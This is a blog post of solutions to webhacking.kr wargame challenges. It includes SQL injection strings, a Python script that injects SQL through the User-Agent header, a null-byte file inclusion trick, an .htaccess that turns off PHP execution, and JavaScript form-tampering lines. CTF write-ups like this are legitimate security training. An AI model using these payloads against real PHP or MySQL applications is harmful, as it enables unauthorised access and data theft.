Please enable JavaScript to view the comments powered by Disqus. Webhacking Kr - I4INFO

Webhacking Kr

Solutions

Posted by Heeraj on January 20, 2016

If you like to read our old blogs you are welcome, I4INFO

For the past one week I was focusing on webhacking kr challenges, so I thought I would share the challenges solution that I was able to solve. They challenges were very, hats off to the team who had worked behind it.

Webhacking Challenge 01

In the first challenge, you have to change cookie value to a number which is in between 5 and 6. In chrome you can use editmycookie or if you are using you could use firebug or any other means

Webhacking Challenge 03

Its just an game which is very similar to soduku. The number gives you the count of the number of black box is possible. After clearing the you will see an input box, you may guess an sql injection. Then probably right , a simple sql injection but here you have to use pipe, that would be most difficult thing that you will take to figure out. But don't waste your time in trying sqli in input box. Try with burp suite, you can easily exploit.

answer=1010100000011100101011111||1&id=kjkjkfd

Webhacking Challenge 04

The thing before you something, you recognise more, a base64 encoding. Well when you decrypt you get something 40 length character. 40 is a big clue, If you have hash identifier tool, you may have till now probably got it. Ya sha1, now try to deocde, ya you have to decode you can use some online tool hashkiller. Again you will get the 40 length character. Decode again :)

Webhacking Challenge 05

In challenge5 you have both the login and join option. In join option when you click, then an alert box comes "Access Denied". When you look at the source you can see a move(),from there you can guess the location of the join(webhacking.kr/challenge/web/web-05/mem/join.php). From there you will be able to get the source code, source code may be difficult to understand. As told in the source code try to make an cookie oldzoombie as well your url should contain the required parameter mode. Then you can join, but to login as admin wouldn't be possible asthere would be one more admin. So you can use username as something as admin%20 and any pass you may like.

Webhacking Challenge 06

The first part of the php code in the index.phps would give you the encoded id and password, getting the 20 times encoded and filtered id and pass.Create a cookie.

Webhacking Challenge 07

This is another sql injection, in this most of the sql statements are filtered, http://webhacking.kr/challenge/web/web-07/index.php?val=13)%0Aunion%0aselect%0a(5-3

Webhacking Challenge 08

import requests
import re

url = "http://webhacking.kr/challenge/web/web-02/index.php"
var=""
s = requests.Session()
headers = {'user-agent': "admin','1234','admin'), ('admin"}
r = s.get("http://webhacking.kr/challenge/web/web-08/" , cookies={'PHPSESSID': 'dontseeoverhere'},headers=headers)
res = r.text
print res

print "\nNext Request \n"
s = requests.Session()
headers = {'user-agent': "admin"}
r = s.get("http://webhacking.kr/challenge/web/web-08/" , cookies={'PHPSESSID': 'dontseeoverhere'},headers=headers)
res = r.text
print res

Webhacking Challenge 10

It was an simple challenge you have to go to ?go=800; you will get it document.write (" go ");

Webhacking Challenge 12


url : http://webhacking.kr/challenge/codeing/code3.html
Hint:(variable worktime)

var enco='';
var enco2=126;
var enco3=33;
var ck=document.URL.substr(document.URL.indexOf('='));
for(i=1;i<122;i++)
{
enco=enco+String.fromCharCode(i,0)
}
function enco_(x)
{
return enco.charCodeAt(x);
}
if(ck=="="+String.fromCharCode(enco_(240))+String.fromCharCode(enco_(220))+String.fromCharCode(enco_(232))+String.fromCharCode(enco_(192))+String.fromCharCode(enco_(226))+String.fromCharCode(enco_(200))+String.fromCharCode(enco_(204))+String.fromCharCode(enco_(222-2))+String.fromCharCode(enco_(198))+"~~~~~~"+String.fromCharCode(enco2)+String.fromCharCode(enco3))
{
alert("Password is "+ck.replace("=",""));
}

When we make the if statement clear we can see that, ck should be equal to =youaregod~~~~~!
Pass:Password is youaregod~~~~~!

Webhacking Challenge 20

Read the page source carefully .
EXPLOIT CODE:
javascript:lv5frm.id.value="a";
javascript:lv5frm.cmt.value="a";
javascript:lv5frm.hack.value=lv5frm.attackme.value;
javascript:lv5frm.submit();

Run 2-3 times repeatdly you may solve the challenge

Webhacking Challenge 25

Local file inclusion. Use %00 can be used for local file inclusion
eg: password.php%00
In the case of windows u have to use ? or ;

Webhacking Challenge 28

In this challenge , you have to view the password , which can only be done if you have a .htaccess file.The content of the file is given below.

php_flag engine off
AddType text/plain php|

Webhacking Challenge 29

Only way to bypass passing the lv as admin. Which can be done as we have insert option.So adding that is easily possible, but the problem would code can easily detect the admin. So we have to use a reverse function.You have 2 input spaces, in first field you have to input id can be anything, and phone can also be anything. So the only thing which is more important is to change is to make admin. The only way is to misuse insert.

id: nimda
phone: 123,reverse(id)),(1,1

I will come with next part of solution with in days

Thank you for reading the blog!